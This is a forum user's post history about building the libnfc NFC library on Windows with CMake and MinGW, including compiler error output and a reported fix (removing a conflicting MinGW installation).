Thank you very much. If I write this program I will post info about it.
16 2013-05-21 07:48:53
Re: LibNfc on windows for newbie (4 replies, posted in Application Programming Interface (API))
Solved: I have MinGW64 and MinGW [requested for an other program]
and Cmake used the MinGW instead the other one. After I uninstall MinGW it worked fine.
17 2013-05-17 15:29:58
Re: LibNfc on windows for newbie (4 replies, posted in Application Programming Interface (API))
Hello, I understood what I missed. After a couple of time that I was able to generate correctly the library following the instructions I receive this error:
c:\nfc_build>mingw32-make
Scanning dependencies of target nfc
[ 1%] Building C object libnfc/CMakeFiles/nfc.dir/nfc.c.obj
[ 3%] Building C object libnfc/CMakeFiles/nfc.dir/nfc-device.c.obj
[ 5%] Building C object libnfc/CMakeFiles/nfc.dir/nfc-emulation.c.obj
[ 7%] Building C object libnfc/CMakeFiles/nfc.dir/nfc-internal.c.obj
[ 8%] Building C object libnfc/CMakeFiles/nfc.dir/conf.c.obj
[ 10%] Building C object libnfc/CMakeFiles/nfc.dir/iso14443-subr.c.obj
[ 12%] Building C object libnfc/CMakeFiles/nfc.dir/mirror-subr.c.obj
[ 14%] Building C object libnfc/CMakeFiles/nfc.dir/target-subr.c.obj
[ 15%] Building C object libnfc/CMakeFiles/nfc.dir/drivers/acr122_usb.c.obj
C:\libnfc-1.7.0-rc7\libnfc\drivers\acr122_usb.c: In function 'acr122_usb_receive
':
C:\libnfc-1.7.0-rc7\libnfc\drivers\acr122_usb.c:587:3: error: 'off_t' undeclared
(first use in this function)
C:\libnfc-1.7.0-rc7\libnfc\drivers\acr122_usb.c:587:3: note: each undeclared ide
ntifier is reported only once for each function it appears in
C:\libnfc-1.7.0-rc7\libnfc\drivers\acr122_usb.c:587:9: error: expected ';' befor
e 'offset'
C:\libnfc-1.7.0-rc7\libnfc\drivers\acr122_usb.c:630:20: error: 'offset' undeclar
ed (first use in this function)
mingw32-make[2]: *** [libnfc/CMakeFiles/nfc.dir/drivers/acr122_usb.c.obj] Error
1
mingw32-make[1]: *** [libnfc/CMakeFiles/nfc.dir/all] Error 2
mingw32-make: *** [all] Error 2I tried to repeat the process several time with the same result. What am I doing wrong? because I am using the same process that worked before
18 2013-05-13 15:57:15
Topic: LibNfc on windows for newbie (4 replies, posted in Application Programming Interface (API))
Hello everyone. I am a newbie of this API.
I am trying to understand How to use this API on windows, with many problems.
I downloaded:
- libnfc-1.7.0-rc7.tar.gz
-cmake-2.8.10.2-win32-x86 [MinGw-W64]
- tdm-gcc-4.7.1-2
- libusb-win32-bin-1.2.6.0
- pcre-7.0
- doxygen [Cmake told me it was missing]
and using the GUI of CMAKE I selected:
- USB Lib Include: libusb-win32-bin-1.2.6.0/include
- USB Lib library: libusb-win32-bin-1.2.6.0/lib/bcc/libusb.lib
- PCRE Include:C:/Program Files (x86)/GnuWin32/include
- PCRE Lib:C:/Program Files (x86)/GnuWin32/lib/pcre.lib
In the GUI I wrote location of the source code: C:/libnfc-1.7.0-rc7/libnfc-1.7.0-rc7
And where to build the file: C:\BuildNFC
And I receive this output:
Found PCRE: C:/Program Files (x86)/GnuWin32/lib/pcre.lib C:/Program Files (x86)/GnuWin32/include
Found LIBUSB: C:/Users/Dany/Documents/NFC-attacks/libusb-win32-bin-1.2.6.0/lib/bcc/libusb.lib C:/Users/Dany/Documents/NFC-attacks/libusb-win32-bin-1.2.6.0/include
Year for copyright is 2013
Configuring done
Generating done
After this I looked inside of the folder BuildNFC and I found many files but nothing like nfc.dll or ".h" files or ".c" files.
What should I do in order to use this library?
Thank you very much. Sorry for this dummies question but I am working on this problem without find the solution.